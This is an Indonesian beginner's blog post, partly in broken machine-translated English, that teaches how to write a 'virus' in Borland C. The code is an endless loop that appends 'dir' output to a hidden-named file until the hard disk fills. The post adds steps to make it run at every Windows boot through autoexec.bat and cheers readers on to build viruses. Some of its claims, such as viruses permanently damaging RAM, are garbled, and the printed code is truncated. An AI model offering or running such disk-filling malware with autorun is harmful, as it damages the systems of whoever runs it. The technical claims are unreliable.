Membuat virus sederhana pada Borland C untuk Pemula

Hi semuanya, kt mulai dari pemrograman komputer, ini merupakan cita-cita dan hampir smua siswa berkeinginan membangun virus komputer.
Virus komputer adalah suatu program yang dibuat untuk dan pada umumnya untuk merusak komputer. Virus komputer adalah program yang sepenuhnya tidak sah.

Sekarang saya akan menjelaskan sedikit tentang virus, virus kebanyakan adalah jenis-jenis dari virus-virus komputer dengan functions(destructive obviously). ada yang mengahapus data penting dan folder, ada yang mengubah pengaturan pada sistem komputer anda seperti registry values, ada yang menelan sejumlah besar memory space dan dump pada hard disc anda. Virus juga dapat merusak RAM parmanently.

Saya akan memberi di sini suatu program virus sederhana yang hanya mempunyai beberapa duri kecil dan mempunyai kemampuan untuk menyumbat hard disc anda.

Logika di balik program itu adalah tak lain hanya membuat diri sendiri berupa file yang berkembang, memperbanyak hingga MB dengan tidak terbatas.

Spesifik untuk buat vir
OS:-Windows98/xp/2000 MS-DOS
Compiler:-Borland C(Which has Dos Shell)
Source Code:-
//START v.c
#include
#include
void main()
{
while(1)
{
system("dir>>â•ša.exe");
}
}
//END

Ketika Anda dapat melihat ini adalah suatu program kecil. Menyusun program yang kita dapat adalah file v.exe ini adalah virus kita.

Bagaimana menmbuatnya? -The system call "dir>>â•ša.exe" will execute the dos command 'dir' dan ridirect its output toa file â•ša.exe (simbol â•š dapat diperoleh dengan menekan 456 pada numpad tahan alt key). Jika menjalankan program ini dalam sebuah folder yang memiliki banyak data dan folder tersebut akan meningkatkan ukurannya oleh â•ša.exe dalam jumlah yang besar. Proses ini akan melanjutkan sampai ketidakterbatasan dalam waktu singkat.

Udah teruji pada win98. Dan kamu tak akan bisa menghapus â•ša.exe GUI.
Untuk auto running, tempatkan v.exe pada folder command di dalam windows folder.
Pada file autoexec.bat(win98) atau autoexec.NT(winXP/2000) tulis v.exe.
Pada saat anda memulai window, v.exe akan jalan secara automatis.
Coba gunakan virus ini pada komputer anda, â•ša.exe adalah virus yang dapat menginfeksi file dimana ukuran foile akan membesar. Jadi untuk menghapus virus dari komputer anda, cukup hapus file v.exe dan â•ša.exe dari komputer anda.

Code:

//START v.c
#include
#include
void main()
{
while(1)
{
system("dir>>â•ša.exe");
}
}
//END

catatan : hati-hati yach....met bwt virus hahaha...

No comments:

Post a Comment

Informasi Pilihan Identitas:
Google/Blogger : Khusus yang punya Account Blogger.
Lainnya : Jika tidak punya account blogger namun punya alamat Blog atau Website.
Anonim : Jika tidak ingin mempublikasikan profile anda (tidak disarankan).